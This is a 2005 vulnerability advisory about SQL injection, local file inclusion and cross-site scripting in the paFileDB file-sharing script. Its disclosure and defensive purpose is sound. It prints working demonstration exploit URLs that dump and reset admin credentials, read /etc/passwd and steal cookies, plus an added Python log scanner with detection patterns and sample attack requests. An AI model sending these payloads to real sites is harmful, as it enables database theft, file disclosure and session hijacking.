SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   paFileDB
Vendors:   PHP Arena
paFileDB Multiple Bugs Permit SQL Injection and Cross-Site Scripting Attacks and Let Remote Users View or Execute Local Files
SecurityTracker Alert ID:  1014209
SecurityTracker URL:  http://securitytracker.com/id/1014209
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jun 15 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): 3.1 and prior versions
Description:   Several input validation vulnerabilities were reported in paFileDB. A remote user can inject SQL commands. A remote user can conduct cross-site scripting attacks. A remote user can also view or execute files on the target system.

The software does not properly validate user-supplied input. A remote user can supply specially crafted parameter values to execute SQL commands on the underlying database. These flaws are exploitable only when the PHP 'magic_quotes_gpc' setting is off.

Some demonstration exploit URLs are provided:

http://[target]/pafiledb.php?action=admin&login=do&formname='%20UNION
%20SELECT%20admin_id,%20admin_username,%20'6f1ed002ab5595859014ebf0951522d9',
%20admin_email,%20'1'%20FROM%20pafiledb_admin%20WHERE%20'1&formpass=blah&B1=
%3E%3E+Log+In+%3C%3C&action=admin&login=do

http://[target]/pafiledb.php?select=-99'%20UNION%20SELECT%200,admin_username,
admin_password,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%201/*&B1=%3E%3E+Edit+
Category+%3C%3C&action=team&tm=category&category=edit&edit=form&menu1=%2F
pafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dcategory%26category%3Dedit

http://[target]/pafiledb.php?id=-99'%20UNION%20SELECT%200,admin_username,
admin_password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%
201/*&B1=%3E%3E+Edit+File+%3C%3C&action=team&tm=file&file=edit&edit=form&menu1
=%2Fpafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dfile%26file%3Dedit

http://[target]/pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do&
query=UPDATE%20pafiledb_admin%20SET%20admin_password%20=%20MD5%281337%28%
20WHERE%201/*

The 'string' parameter in 'search.php' is affected.

The 'pafiledb.php' script includes files based on the 'action' parameter without validating the parameter value. A remote user can cause the system to include a local file, which may allow the remote user to view files on the target system or to execute local scripting files. A demonstration exploit URL is provided:

http://[target]/pafiledb.php?action=../../../../etc/passwd%00&login=do

Several parameters are not properly filtered to remove HTML code. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the paFileDB software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/pafiledb.php?action=viewall&start=20&sortby=name%22
%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

http://[target]/pafiledb.php?action=category&id=1&filelist=%22%3E%3C
script%3Ealert%28document.cookie%29%3C%2Fscript%3E

http://[target]/pafiledb.php?action=category&id=1&pages=%22%3E
%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

James Bercegay of the GulfTech Security Research Team reported this vulnerability.
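
For triage on a site that ran an affected release, the request patterns described above can be searched for in web server access logs. The following is an added example, not part of the original advisory or the vendor's code: it flags requests to 'pafiledb.php' whose parameters match the three flaw classes. The log lines are constructed, and treating legitimate 'action' values as plain words is an assumption based on the URLs shown above; the 'string' parameter of 'search.php' is left out because the advisory does not say which flaw affects it.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter names taken from the advisory's demonstration URLs.
SQLI_PARAMS = {"formname", "select", "id", "query"}
XSS_PARAMS = {"sortby", "filelist", "pages"}
# Quote, UNION SELECT, UPDATE ... SET, or a comment opener in a SQL-bound value.
SQLI_RE = re.compile(r"'|\bunion\b.+\bselect\b|\bupdate\b.+\bset\b|/\*", re.I | re.S)
XSS_RE = re.compile(r'[<>"]')
# Assumption: legitimate 'action' values are plain words (admin, team, viewall).
ACTION_OK = re.compile(r"\w*")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (combined-log style); not real traffic.
SAMPLE_LOG = """
198.51.100.7 - - [15/Jun/2005:10:00:01 +0000] "GET /pafiledb.php?action=viewall&start=20&sortby=name HTTP/1.1" 200 5120
203.0.113.9 - - [15/Jun/2005:10:02:11 +0000] "GET /pafiledb.php?action=../../../../etc/passwd%00&login=do HTTP/1.1" 200 1822
203.0.113.9 - - [15/Jun/2005:10:02:40 +0000] "GET /pafiledb.php?id=-99'%20UNION%20SELECT%200,admin_username%20FROM%20pafiledb_admin%20WHERE%201/*&action=team HTTP/1.1" 200 904
203.0.113.9 - - [15/Jun/2005:10:03:05 +0000] "GET /pafiledb.php?action=category&id=1&pages=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E HTTP/1.1" 200 3310
""".strip().splitlines()

def classify(url):
    """Return the sorted flaw classes a request URL matches, or [] if none."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("pafiledb.php"):
        return []
    hits = set()
    # parse_qsl percent-decodes values, so %00 and %27 are seen as raw characters.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        name = name.lower()
        if name == "action" and not ACTION_OK.fullmatch(value):
            hits.add("file-include")  # traversal, slash or NUL in include target
        if name in SQLI_PARAMS and SQLI_RE.search(value):
            hits.add("sql-injection")
        if name in XSS_PARAMS and XSS_RE.search(value):
            hits.add("xss")
    return sorted(hits)

def scan(log_lines):
    """Yield (line_number, classes) for access-log lines worth reviewing."""
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        classes = classify(m.group(1)) if m else []
        if classes:
            yield n, classes

if __name__ == "__main__":
    for n, classes in scan(SAMPLE_LOG):
        print(n, ", ".join(classes))
```

Parameters sent in POST bodies do not appear in access logs, so this covers only query-string requests.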

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the paFileDB software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can execute SQL commands on the underlying database.

A remote user can view files or execute scripting files on the target system with the privileges of the target web service.

Solution:   The vendor has issued a fixed version.

[Editor's note: The fixed version has the same version number as the vulnerable version.]

Vendor URL:  www.phparena.net/pafiledb.php
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.



Copyright 2021, SecurityGlobal.net LLC